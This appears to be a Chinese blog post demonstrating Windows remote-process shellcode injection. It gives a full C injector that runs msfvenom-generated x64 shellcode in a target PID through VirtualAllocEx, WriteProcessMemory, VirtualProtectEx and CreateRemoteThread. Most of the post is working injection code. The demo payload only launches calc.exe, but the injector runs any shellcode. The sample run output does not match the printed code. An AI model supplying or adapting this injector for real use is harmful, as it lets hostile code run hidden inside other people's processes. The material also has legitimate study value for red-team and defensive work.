Code Injection Demo

Code Injection Demo

Function

  • OpenProcess
  • VirtualAllocEx
  • WriteProcessMemory
  • CreateRemoteThread

Process

  • 使用 OpenProcess 函数获取对进程的访问权限
  • 使用 VirtualAllocEx 函数在远程进程空间中分配一块内存
  • 使用 WriteProcessMemory 函数将 shellcode 复制到分配的内存中
  • 使用 CreateRemoteThread 函数在远程进程中创建一个线程,并传入第二步分配到的内存(shellcode)。注意:shellcode 的架构(x86/x64)必须与注入器和目标进程一致,否则线程会立刻崩溃。

/* Step 2: reserve+commit a region in the target process the size of the payload.
   Note: this asks for an RWX page up front; a tighter variant allocates PAGE_READWRITE,
   writes, then flips to PAGE_EXECUTE_READ with VirtualProtectEx. */
(PWSTR)VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE)

/* Step 3: copy the shellcode bytes into that remote region (bytes-written count is not requested). */
WriteProcessMemory(hProcess, remote_buffer, shellcode, sizeof(shellcode), NULL)

/* Step 4: start a thread in the target whose entry point is the remote buffer, with no argument. */
CreateRemoteThread(hProcess, NULL, 0, remote_buffer, NULL, 0, NULL)

demo

codeinjection.c

#include <Windows.h>
#include <tchar.h>


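/*
 * Inject the embedded x64 shellcode into process PID and run it on a new thread.
 *
 * Chain: OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> VirtualProtectEx
 *        -> CreateRemoteThread -> WaitForSingleObject.
 *
 * PID:     target process id.
 * Returns: TRUE once the remote thread has been created and has terminated,
 *          FALSE on any API failure (the Win32 error code is printed).
 *
 * Changes versus the original listing:
 *   - OpenProcess returns NULL on failure, not INVALID_HANDLE_VALUE; the old
 *     check let a failed open fall through to VirtualAllocEx(NULL, ...).
 *   - Access mask reduced from PROCESS_ALL_ACCESS to the rights this chain
 *     actually needs (least privilege; see CreateRemoteThread docs).
 *   - Buffer is allocated PAGE_READWRITE, filled, then flipped to
 *     PAGE_EXECUTE_READ, so no writable+executable page is ever mapped.
 *   - Start routine is cast explicitly; log line no longer says "DLL".
 *
 * Caveats: the payload is msfvenom windows/x64/exec, so injector and target
 * must both be 64-bit. EXITFUNC=thread makes the payload end its own thread,
 * which is what lets the INFINITE wait return; with a payload that never
 * exits this call would block forever.
 */
BOOL ShellCodeRemoteInjection(DWORD PID)
{
    /* msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -b "\x00" -f c -v shellcode */
    unsigned char shellcode[] =
        "\x48\x31\xc9\x48\x81\xe9\xdd\xff\xff\xff\x48\x8d\x05\xef\xff"
        "\xff\xff\x48\xbb\x0f\xd2\x5c\x69\xeb\xc9\xe0\xaa\x48\x31\x58"
        "\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xf3\x9a\xdf\x8d\x1b\x21"
        "\x20\xaa\x0f\xd2\x1d\x38\xaa\x99\xb2\xfb\x59\x9a\x6d\xbb\x8e"
        "\x81\x6b\xf8\x6f\x9a\xd7\x3b\xf3\x81\x6b\xf8\x2f\x9a\xd7\x1b"
        "\xbb\x81\xef\x1d\x45\x98\x11\x58\x22\x81\xd1\x6a\xa3\xee\x3d"
        "\x15\xe9\xe5\xc0\xeb\xce\x1b\x51\x28\xea\x08\x02\x47\x5d\x93"
        "\x0d\x21\x60\x9b\xc0\x21\x4d\xee\x14\x68\x3b\x42\x60\x22\x0f"
        "\xd2\x5c\x21\x6e\x09\x94\xcd\x47\xd3\x8c\x39\x60\x81\xf8\xee"
        "\x84\x92\x7c\x20\xea\x19\x03\xfc\x47\x2d\x95\x28\x60\xfd\x68"
        "\xe2\x0e\x04\x11\x58\x22\x81\xd1\x6a\xa3\x93\x9d\xa0\xe6\x88"
        "\xe1\x6b\x37\x32\x29\x98\xa7\xca\xac\x8e\x07\x97\x65\xb8\x9e"
        "\x11\xb8\xee\x84\x92\x78\x20\xea\x19\x86\xeb\x84\xde\x14\x2d"
        "\x60\x89\xfc\xe3\x0e\x02\x1d\xe2\xef\x41\xa8\xab\xdf\x93\x04"
        "\x28\xb3\x97\xb9\xf0\x4e\x8a\x1d\x30\xaa\x93\xa8\x29\xe3\xf2"
        "\x1d\x3b\x14\x29\xb8\xeb\x56\x88\x14\xe2\xf9\x20\xb7\x55\xf0"
        "\x2d\x01\x21\x51\xc8\xe0\xaa\x0f\xd2\x5c\x69\xeb\x81\x6d\x27"
        "\x0e\xd3\x5c\x69\xaa\x73\xd1\x21\x60\x55\xa3\xbc\x50\x29\xfd"
        "\x80\x05\x93\xe6\xcf\x7e\x74\x7d\x55\xda\x9a\xdf\xad\xc3\xf5"
        "\xe6\xd6\x05\x52\xa7\x89\x9e\xcc\x5b\xed\x1c\xa0\x33\x03\xeb"
        "\x90\xa1\x23\xd5\x2d\x89\x0a\x8a\xa5\x83\x84\x6a\xaa\x39\x69"
        "\xeb\xc9\xe0\xaa";

    /* Exactly the rights OpenProcess/VirtualAllocEx/WriteProcessMemory/
     * VirtualProtectEx/CreateRemoteThread require — not PROCESS_ALL_ACCESS. */
    const DWORD access = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                         PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ;

    BOOL status = FALSE;
    HANDLE hProcess = NULL;
    HANDLE hThread = NULL;
    LPVOID remote_buffer = NULL;
    DWORD old_protect = 0;

    _tprintf(L"Injecting shellcode into PID: %lu \n", PID);

    /* OpenProcess signals failure with NULL (INVALID_HANDLE_VALUE is for file APIs). */
    hProcess = OpenProcess(access, FALSE, PID);
    if (hProcess == NULL)
    {
        _tprintf(L"Get Process Handle Error : %lu\n", GetLastError());
        goto cleanup;
    }

    /* Allocate writable-only first; execute permission is granted after the copy. */
    remote_buffer = VirtualAllocEx(hProcess, NULL, sizeof(shellcode),
                                   MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (remote_buffer == NULL)
    {
        _tprintf(L"VirtualAlloc Error %lu \n", GetLastError());
        goto cleanup;
    }

    if (!WriteProcessMemory(hProcess, remote_buffer, shellcode, sizeof(shellcode), NULL))
    {
        _tprintf(L"WriteProcessMemory Error %lu \n", GetLastError());
        goto cleanup;
    }

    /* Flip RW -> RX so the page is never simultaneously writable and executable. */
    if (!VirtualProtectEx(hProcess, remote_buffer, sizeof(shellcode), PAGE_EXECUTE_READ, &old_protect))
    {
        _tprintf(L"VirtualProtectEx Error %lu \n", GetLastError());
        goto cleanup;
    }

    /* Harmless on x86/x64 but correct form after writing code into another process. */
    FlushInstructionCache(hProcess, remote_buffer, sizeof(shellcode));

    hThread = CreateRemoteThread(hProcess, NULL, 0,
                                 (LPTHREAD_START_ROUTINE)remote_buffer, NULL, 0, NULL);
    if (hThread == NULL)
    {
        _tprintf(L"CreateRemoteThread Error %lu \n", GetLastError());
        goto cleanup;
    }

    /* Blocks until the payload thread exits (EXITFUNC=thread); only then is the
     * remote buffer safe to release below. */
    WaitForSingleObject(hThread, INFINITE);
    status = TRUE;

cleanup:
    /* remote_buffer is non-NULL only if hProcess was valid, so this order is safe. */
    if (remote_buffer != NULL)
    {
        VirtualFreeEx(hProcess, remote_buffer, 0, MEM_RELEASE);
    }
    if (hThread != NULL)
    {
        CloseHandle(hThread);
    }
    if (hProcess != NULL)
    {
        CloseHandle(hProcess);
    }
    return status;
}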

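/*
 * Entry point: `remote_shellcode_injection.exe <pid>`.
 *
 * Parses the PID strictly (digits only, non-zero) instead of _tstol, which
 * silently turned junk such as "abc" into PID 0, and returns a non-zero exit
 * status when injection fails so scripts can tell success from failure.
 * envp is accepted for signature compatibility and not used.
 */
int _tmain(int argc, TCHAR* argv[], TCHAR* envp[])
{
    TCHAR *end = NULL;
    unsigned long pid = 0;

    (void)envp;

    if (argc != 2)
    {
        _tprintf(L"Usage: %s <pid> \n", argv[0]);
        return(1);
    }

    /* Reject empty, partially numeric, or zero PIDs before touching any process. */
    pid = _tcstoul(argv[1], &end, 10);
    if (end == argv[1] || *end != _T('\0') || pid == 0)
    {
        _tprintf(L"Invalid PID: %s \n", argv[1]);
        return(1);
    }

    if (ShellCodeRemoteInjection((DWORD)pid))
    {
        _tprintf(L"Shellcode Injection Success \n");
        return(0);
    }

    _tprintf(L"Shellcode Injection Fail \n");
    return(1);
}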

运行

remote_shellcode_injection.exe 8044
# Injecting DLL to PID: 8044
# Shellcode Injection Sucess

Success



本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!